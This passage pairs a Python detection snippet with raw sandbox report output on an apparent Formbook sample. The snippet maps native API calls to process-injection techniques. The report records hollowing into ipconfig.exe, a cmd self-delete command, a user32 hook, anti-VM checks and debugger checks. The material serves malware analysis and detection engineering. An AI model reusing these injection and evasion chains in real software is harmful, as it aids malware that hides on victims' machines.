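    "13_2_02C198A0 NtWriteVirtualMemory,",
    "13_2_02C1B040 NtSuspendThread,",
    "13_2_02C199D0 NtCreateProcessEx,",
    "13_2_02C19950 NtQueueApcThread,",
    "13_2_02C1AD30 NtSetContextThread,",
]

# Technique -> the native calls it needs. This grouping is the example's own
# approximation (roughly MITRE T1055.012, .004, .003 and T1055 via a remote thread).
TECHNIQUES = {
    "process_hollowing": {"NtCreateProcessEx", "NtUnmapViewOfSection", "NtCreateSection",
                          "NtMapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "apc_injection": {"NtOpenThread", "NtQueueApcThread", "NtResumeThread"},
    "thread_hijack": {"NtOpenThread", "NtSuspendThread", "NtGetContextThread",
                      "NtSetContextThread", "NtResumeThread"},
    "classic_remote_thread": {"NtOpenProcess", "NtAllocateVirtualMemory",
                              "NtWriteVirtualMemory", "NtCreateThreadEx"},
}

# <pid>_<phase>_<address> <call>,<call>,...
LINE_RE = re.compile(r"^(\d+)_(\d+)_([0-9A-F]{8}) (.*)$")


def parse_code_functions(lines):
    """Return {pid: {api_name: first address it was seen at}}."""
    seen = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        pid, _phase, addr, calls = m.groups()
        for api in filter(None, calls.split(",")):
            seen.setdefault(int(pid), {}).setdefault(api, int(addr, 16))
    return seen


def classify(apis):
    """For every technique, say whether its full call set is present and what is missing."""
    names = set(apis)
    result = {}
    for tech, needed in TECHNIQUES.items():
        have = needed & names
        result[tech] = {"complete": have == needed, "missing": sorted(needed - have)}
    return result


def stubs_in_region(apis, base, end):
    """Nt* stubs whose address lies in [base, end): resolved from a private ntdll
    copy when that range is an RWX region rather than the loaded ntdll.dll."""
    return sorted(a for a, addr in apis.items() if a.startswith("Nt") and base <= addr < end)


if __name__ == "__main__":
    funcs = parse_code_functions(REPORT_LINES)[13]
    for tech, verdict in classify(funcs).items():
        print(f"{tech:<22} complete={verdict['complete']} missing={verdict['missing']}")
    # 0x02BB0000..0x02CD0000 approximates the wntdll.pdb region from the report (assumption)
    print(len(stubs_in_region(funcs, 0x02BB0000, 0x02CD0000)), "Nt* stubs inside the private ntdll range")
```

For detection engineering the useful output is the combination, not any single call: `NtWriteVirtualMemory` alone is noisy, but hollowing, APC and context-swap sets all being complete inside a renamed copy of a system utility is the Formbook signature the report's "Sample uses process hollowing technique", "Queues an APC in another process" and "Modifies the context of a thread in another process" verdicts summarise.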
Source: skyrunyyu655432.exe Virustotal: Detection: 42%
Source: skyrunyyu655432.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\skyrunyyu655432.exe File read: C:\Users\user\Desktop\skyrunyyu655432.exe
Source: skyrunyyu655432.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\skyrunyyu655432.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\skyrunyyu655432.exe "C:\Users\user\Desktop\skyrunyyu655432.exe"
Source: C:\Users\user\Desktop\skyrunyyu655432.exe Process created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Process created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\skyrunyyu655432.exe Process created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe Process created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe C:\Users\user\AppData\Local\Temp\pvrclmgpss
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe"
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeFile created: C:\Users\user\AppData\Local\Temp\nspF161.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@2/2
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00402078 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00404333 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: ipconfig.pdb source: jfotlqeoqb.exe, 00000003.00000002.373051178.00000000019D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: jfotlqeoqb.exe, 00000003.00000002.373051178.00000000019D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: C:\drzmu\ggsdfz\yvaw\e1787da5c4714b909513c5a841b06b91\ftesxt\xwtvbdyl\Release\xwtvbdyl.pdb source: skyrunyyu655432.exe, 00000000.00000002.321823751.000000000040B000.00000004.00000001.01000000.00000003.sdmp, skyrunyyu655432.exe, 00000000.00000002.322060613.000000000275C000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000002.292672930.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, jfotlqeoqb.exe, 00000002.00000000.279753075.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, jfotlqeoqb.exe, 00000003.00000000.287892253.00000000001FB000.00000002.00000001.01000000.00000004.sdmp, ipconfig.exe, 0000000D.00000002.547054865.00000000030DF000.00000004.10000000.00040000.00000000.sdmp, nspF162.tmp.0.dr, jfotlqeoqb.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: jfotlqeoqb.exe, 00000002.00000003.291035467.000000001E160000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000003.290469489.000000001DFD0000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.293986604.0000000001865000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.292333571.00000000016D0000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373260356.0000000001B1F000.00000040.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373075677.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546062335.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546473284.0000000002CCF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.372760279.0000000002877000.00000004.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.375023667.0000000002A13000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jfotlqeoqb.exe, 00000002.00000003.291035467.000000001E160000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000002.00000003.290469489.000000001DFD0000.00000004.00001000.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.293986604.0000000001865000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000003.292333571.00000000016D0000.00000004.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373260356.0000000001B1F000.00000040.00000800.00020000.00000000.sdmp, jfotlqeoqb.exe, 00000003.00000002.373075677.0000000001A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 0000000D.00000002.546062335.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000002.546473284.0000000002CCF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.372760279.0000000002877000.00000004.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000D.00000003.375023667.0000000002A13000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001EF035 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_001EF035 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_004168D5 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041E9A8 push dword ptr [25B3BB99h]; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00416CD3 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00417CF5 pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_0041D50B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C2D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024D68D5 push ebp; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DE9A8 push dword ptr [25B3BB99h]; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024D6CD3 push esi; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024D7CF5 pushfd ; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DD4B5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DD56C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DD50B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_024DD502 push eax; ret
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,

          Persistence and Installation Behavior

          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeFile created: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE1
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000024C9904 second address: 00000000024C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000024C9B7E second address: 00000000024C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6276Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeAPI coverage: 5.2 %
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 8.3 %
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_004026A1 FindFirstFileA,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000006.00000000.317703747.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.326481142.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000006.00000000.326503153.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.353634268.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.410432696.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.328565988.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000006.00000000.353634268.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 00000006.00000000.353562896.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.317703747.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000006.00000000.353634268.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001EE891 _memset,IsDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F4395 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\skyrunyyu655432.exeCode function: 0_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_001F538A __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 3_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_016503F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_01650772 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_01650736 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_0165061D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exeCode function: 2_2_016506F7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02CA8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02BE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C9138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_02C8D380 mov ecx, dword ptr fs:[00000030h]
